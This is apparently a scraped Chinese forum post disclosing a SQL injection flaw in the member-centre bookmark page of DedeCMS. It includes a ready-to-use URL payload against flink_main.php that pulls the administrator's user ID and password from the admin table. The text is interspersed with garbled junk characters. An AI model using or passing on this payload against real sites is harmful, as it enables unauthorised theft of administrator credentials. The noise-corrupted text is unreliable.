DedeCMS会员中心SQL注射漏洞
# Y# H5 Q b. s+ v+ }+ X需要magic_quotes_gpc = Off
7 M* u- A! d; q. V5 v/ V$ K: B. d会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
% H3 q/ `9 J- }* r) O8 w& O 5 Z( W2 @5 A$ {4 y% h, E' L5 U* ?3 {
DedeCMS会员中心书签管理SQL注射漏洞* q- X3 T& }# [
成功利用该漏洞可获得管理员密码
' J7 @1 [7 b( f$ h
- D0 r R9 i0 w2 ?4 w2 d会员登录后可以执行SQL语句查询数据库任意内容如管理员密码2 P% L& s" K2 ?
# v% V ^' E i1 bhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
$ L4 W; e, g a0 @4 o |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59